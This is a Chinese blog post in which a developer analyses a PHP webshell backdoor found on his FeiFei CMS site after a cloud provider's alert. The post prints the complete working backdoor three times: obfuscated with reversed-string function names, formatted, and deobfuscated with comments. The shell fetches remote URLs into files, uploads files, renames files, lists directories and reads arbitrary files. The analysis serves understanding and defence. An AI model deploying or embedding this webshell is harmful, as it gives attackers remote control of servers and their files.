PHP恶意后门代码

原创  郑建华   2020-07-28   24人阅读  0 条评论

    最近在研究飞飞CMS对接安卓app,其中使用了飞飞CMS提供接口,然而第二天就收到了阿里云的短信提醒,提示存在webshell后门。

image.png

打开后台,查看文件,内容如下

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D&nbsp;'.$fn.'<br>';}else{$t2.='&nbsp;&nbsp;'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>

image.png

进行格式化后:

<?php error_reporting(0);
$sr="st".
/*+/*+*/
"rr"
/*+/*+*/
."ev";
$id=$sr
/*+/*+*/
("ri"."d_"."si");
$rn=$sr
/*+/*+*/
("em"."an"."er");
$dn=$sr
/*+/*+*/
("em"."anr"."id");
$od=$sr
/*+/*+*/
("ri"."dne"."po");
$rd=$sr
/*+/*+*/
("ri"."dda"."er");
$cd=$sr
/*+/*+*/
("ri"."deso"."lc");
$fpc=$sr
/*+/*+*/
("stn"."etn"."oc_t"."up_e"."lif");
$fgc=$sr
/*+/*+*/
("stn"."etn"."oc_t"."eg_e"."lif");
$muf=$sr
/*+/*+*/
("eli"."f_d"."eda"."olp"."u_e"."vom");
$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';
$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';
$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';
$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';
$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';
if($_GET['act']=='dl') {
	echo($dlform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$fpc
		/*+/*+*/
		($_POST['fn'],$fgc
		/*+/*+*/
		($_POST['url']));
	}
	exit;
}
if($_GET['act']=='ul') {
	echo($ulform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
		$muf
		/*+/*+*/
		($
		/*+/*+*/ {
			"_F"."IL"."ES"
		}
		["uf"]["tmp_name"],$sp.$
		/*+/*+*/ {
			"_F"."IL"."ES"
		}
		["uf"]["name"]);
	}
	exit;
}
if($_GET['act']=='rn') {
	echo($rnform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$rn
		/*+/*+*/
		($_POST['on'],$_POST['nn']);
	}
	exit;
}
if($_GET['act']=='gp') {
	echo($dn
	/*+/*+*/
	(__FILE__));
	exit;
}
if($_GET['act']=='lp') {
	echo($lpform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$dp=$_POST['dp'].'/';
		$h=$od
		/*+/*+*/
		($dp);
		while(($fn=$rd
		/*+/*+*/
		($h))!==false) {
			if($id
			/*+/*+*/
			($dp.$fn)) {
				$t1.='D&nbsp;'.$fn.'<br>';
			} else {
				$t2.='&nbsp;&nbsp;'.$fn.'<br>';
			}
		}
		$cd
		/*+/*+*/
		($dp);
		echo($dp.'<br>'.$t1.$t2);
	}
	exit;
}
if($_GET['act']=='sf') {
	echo($sfform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$df=$_POST['df'];
		echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc
		/*+/*+*/
		($df).'</textarea>');
	}
	exit;
}
?>

去除混淆,解析

<?php
// 关闭所有PHP错误报告error_reporting(0);
/**
 * 这一段是申明函数名称,
 * 如:file_put_contents,move_uploaded_file,rename,dirname
 */
$dlform='<form method="post">
FN:<input name="fn" size="20" type="text">
URL:<input name="url" size="50" type="text">
<input type="submit" value="ok">
</form>';$ulform='<form method="post" enctype="multipart/form-data">
<input name="uf" type="file">
SP:<input name="sp" size="50" type="text">
<input type="submit" value="ok">
</form>';$rnform='<form method="post">
ON:<input name="on" size="50" type="text">
NN:<input name="nn" size="50" type="text">
<input type="submit" value="ok"></form>';$lpform='<form method="post">
DP:<input name="dp" size="50" type="text">
<input type="submit" value="ok">
</form>';$sfform='<form method="post">
DF:<input name="df" size="50" type="text">
<input type="submit" value="ok">
</form>';
// 将指定网站(url)下的源代码保存在 $_POST['fn'] 里if($_GET['act']=='dl') {
    echo($dlform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        file_put_contents($_POST['fn'],file_get_contents($_POST['url']));
    }
    exit;}
// 上传文件并重命名if($_GET['act']=='ul') {
    echo($ulform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        $sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
        move_uploaded_file(${"_FILES"}["uf"]["tmp_name"],$sp.${"_FILES"}["uf"]["name"]);
    }
    exit;}
// 重命名指定文件或目录if($_GET['act']=='rn') {
    echo($rnform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        rename($_POST['on'],$_POST['nn']);
    }
    exit;}
// 获取当前路径if($_GET['act']=='gp') {
    echo(dirname(__FILE__));
    exit;}
// 循环扫描指定目录下的文件和文件夹if($_GET['act']=='lp') {
    echo($lpform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        $dp=$_POST['dp'].'/';
        $h=opendir($dp);
        while(($fn=readdir($h))!==false) {
            if(is_dir($dp.$fn)) {
                $t1.='D '.$fn.'<br>';
            } else {
                $t2.='  '.$fn.'<br>';
            }
        }
        closedir($dp);
        echo($dp.'<br>'.$t1.$t2);
        }
        exit;}
// 获取服务器上指定文件的内容(根据上面循环扫描得到全路径)if($_GET['act']=='sf') {
    echo($sfform);
    if($_SERVER['REQUEST_METHOD']=='POST'){
        $df=$_POST['df'];
        echo('<textarea style="width:100%;height:100%;" wrap="off">'.file_get_contents($df).'</textarea>');
    }
    exit;}?>

主要功能:获取当前目录,扫描目录,获取文件内容,上传木马。


本文地址:https://www.zjh336.cn/?id=1929
版权声明:本文为原创文章,版权归 郑建华 所有,欢迎分享本文,转载请保留出处!

发表评论


表情

还没有留言,还不快点抢沙发?